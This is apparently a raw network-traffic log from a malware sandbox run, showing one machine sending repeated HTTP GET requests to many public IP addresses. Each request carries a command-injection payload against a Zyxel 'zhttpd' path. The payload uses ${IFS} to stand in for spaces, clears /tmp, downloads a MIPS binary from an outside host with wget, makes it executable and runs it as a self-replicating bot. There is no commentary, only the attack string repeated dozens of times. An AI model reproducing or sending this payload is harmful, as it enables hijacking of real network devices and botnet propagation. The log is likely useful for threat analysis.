                                                        Jan 28, 2024 10:12:55.450953007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5118192.168.2.14367805.162.110.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.450987101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5119192.168.2.1443206199.204.60.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451049089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5120192.168.2.1453382129.109.41.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451102972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5121192.168.2.1459496208.159.225.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451144934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5122192.168.2.1454374182.84.22.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451206923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5123192.168.2.143897859.22.124.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451246977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5124192.168.2.1442776189.211.57.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451270103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5125192.168.2.143575260.71.171.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451322079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5126192.168.2.1436480114.100.85.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451344013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5127192.168.2.1460234153.116.1.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451390982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5128192.168.2.144310635.163.38.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451446056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5129192.168.2.1454972110.192.38.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451477051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5130192.168.2.1441000112.133.121.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451518059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5131192.168.2.143964239.33.99.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451566935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5132192.168.2.145067839.38.124.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451608896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5133192.168.2.1438196187.73.170.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451637030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5134192.168.2.145399650.102.178.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451698065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5135192.168.2.145445679.218.116.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451724052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5136192.168.2.1439918102.18.115.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451755047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5137192.168.2.1435014115.123.201.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451796055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5138192.168.2.1453486156.115.184.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451843023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5139192.168.2.1444322149.140.92.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451891899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5140192.168.2.1457274198.182.170.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451921940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5141192.168.2.1442314137.127.235.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451945066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5142192.168.2.145915270.59.243.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.451971054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5143192.168.2.1456384108.205.84.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452019930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5144192.168.2.144888076.221.168.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452080011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5145192.168.2.1458086158.119.214.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452126026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5146192.168.2.1460030117.158.211.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452172995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5147192.168.2.144331896.100.142.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452215910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5148192.168.2.144540438.24.34.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452250957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5149192.168.2.1452042179.193.213.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452295065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5150192.168.2.1457526222.59.26.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452325106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5151192.168.2.1453840203.21.201.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452362061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5152192.168.2.143781881.223.153.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452413082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5153192.168.2.1443090142.14.142.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452446938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5154192.168.2.1459866190.91.32.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452492952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5155192.168.2.1437320147.145.206.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452517986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5156192.168.2.1450220151.227.158.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452543974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5157192.168.2.143632297.181.3.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452590942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5158192.168.2.1442894107.253.92.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452625990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5159192.168.2.1436492104.240.73.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452682972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5160192.168.2.1434010162.13.194.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452717066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5161192.168.2.143729423.112.236.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452774048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5162192.168.2.1449808134.208.59.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452816010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5163192.168.2.1434636150.71.99.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452861071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5164192.168.2.1454358179.146.168.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452893972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5165192.168.2.1455380207.150.36.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452924013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5166192.168.2.1453290161.43.2.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.452967882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5167192.168.2.1452806152.23.217.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453013897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5168192.168.2.14557509.234.121.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453053951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5169192.168.2.144893099.158.155.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453085899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5170192.168.2.1460156163.242.24.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453123093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5171192.168.2.1440066167.185.50.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453165054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5172192.168.2.1446054137.60.100.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453219891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5173192.168.2.1446376143.149.38.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453255892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5174192.168.2.145515638.236.131.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453305006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5175192.168.2.14607468.32.37.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453351021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5176192.168.2.1435198170.213.89.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453393936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5177192.168.2.145420683.188.153.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.453422070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5178192.168.2.144334092.143.138.232443
                                                        TimestampBytes transferredDirectionData
